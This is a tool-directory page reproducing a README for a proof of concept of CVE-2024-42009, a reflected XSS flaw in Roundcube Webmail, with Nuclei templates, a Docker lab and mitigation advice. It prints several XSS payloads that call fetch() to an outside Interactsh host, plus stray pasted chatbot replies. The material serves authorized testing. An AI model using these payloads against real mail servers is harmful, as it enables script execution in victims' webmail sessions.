Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-42009 — Nuclei templates and Docker lab to demonstrate and validate CVE-2024-42009, a reflected XSS in Roundcube Webmail, using Out-of-Band detection via Interactsh for authorized testing. | Kitploit
Tools/GitHubGitHub/shubhankargupta691/cve-2024-42009
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubshubhankargupta691/cve-2024-42009

CVE-2024-42009

Nuclei templates and Docker lab to demonstrate and validate CVE-2024-42009, a reflected XSS in Roundcube Webmail, using Out-of-Band detection via Interactsh for authorized testing.

View Repository
31 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-42009 – Reflected XSS in Roundcube Webmail

📌 Overview

This repository contains a Nuclei template and supporting resources to safely demonstrate and validate CVE-2024-42009, a critical reflected XSS vulnerability in Roundcube Webmail. The flaw resides in the message_body() function in show.php, where post-sanitization modifications lead to desanitization and unsafe rendering of crafted HTML email content.

⚠️ This PoC is intended for educational and authorized testing only. Do not use against systems you do not own or have explicit permission to test.


🧠 Vulnerability Summary

  • CVE ID: CVE-2024-42009
  • Severity: Critical (CVSS 9.8)
  • Affected Versions: Roundcube ≤ 1.6.7 and ≤ 1.5.7
  • Patched Versions: 1.6.8 and 1.5.8
  • Component: message_body() in show.php
  • Impact: Arbitrary JavaScript execution when a user views a malicious email

🧪 Detection Strategy (Lab Use Only)

This repo uses Out-of-Band (OOB) detection via Interactsh to confirm JavaScript execution in a controlled lab.

Key Steps:

  1. Deploy vulnerable Roundcube instance (e.g., via Docker)
  2. Send crafted email with <body> tag containing onanimationstart and a beacon to Interactsh
  3. Open the email in Roundcube UI
  4. Confirm DNS/HTTP callback to Interactsh domain

🐳 Lab Setup

Use the provided Docker Compose file to spin up a local Roundcube instance with MailHog (SMTP sink) and MariaDB.

git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
  • Roundcube UI: http://localhost:8080
  • MailHog UI: http://localhost:8025
  • Login Method: Google Account

⚠️ Do not use your Google Account.


📁 Repository Contents

  • CVE-2024-42009-OOB.yaml – Nuclei template with Interactsh and Out-of-Band (OOB) detection
  • CVE-2024-42009.yaml – Nuclei template without Interactsh and OOB
  • docker-compose.yml – Lab environment setup for Roundcube Webmail
  • Images/ – Screenshots showing HTTP/DNS hits from Interactsh

🎥 Video Demonstration

This video walks through the full exploit chain:

  • Crafting the payload
  • Sending it via email or endpoint
  • Triggering the vulnerability
  • Confirming the beacon via Interactsh

(video demo)


To responsibly include those XSS payloads in your README, you’ll want to place them in a section clearly labeled for educational or testing purposes. Here's a suggested structure:


🧪 XSS Payload Examples (For Testing Purposes Only)

⚠️ Disclaimer: These payloads are intended for educational use and authorized security testing only. Do not deploy them on systems without explicit permission.

<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">

<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/main/x" onerror="fetch('https://interact.sh/hit')">

<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>

<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>

<!-- JavaScript in iframe src -->

🧭 How to Use

  • Replace https://interact.sh/hit with your own listener endpoint.
  • Use these in controlled environments like local labs or CTF platforms.
  • Monitor your endpoint for incoming requests to validate execution.

🛡️ Mitigation

Upgrade Roundcube to:

  • 1.6.8 or 1.5.8
    These versions remove the vulnerable post-processing logic and apply stricter sanitization and CSP headers.

📜 References

Perfect — here’s a clean and professional References section you can include in your README or email submission for CVE-2024-42009. It cites all the sources you've listed, formatted for clarity and credibility:


📚 References

  • NVD CVE Entry – CVE-2024-42009 – Official vulnerability listing with CVSS score and affected versions
  • SonarSource Blog – Government Emails at Risk – In-depth technical analysis and exploit breakdown
  • GitHub PoC by DaniTheHack3r – Python-based exploit with email listener and animation-triggered payload
  • GitHub PoC by Bhanunamikaze – Automated payload injection and exfiltration via HTTP listener
  • GitHub PoC by 0xbassiouny1337 – Stored XSS exploit with real-time email capture and decoding

Download Tool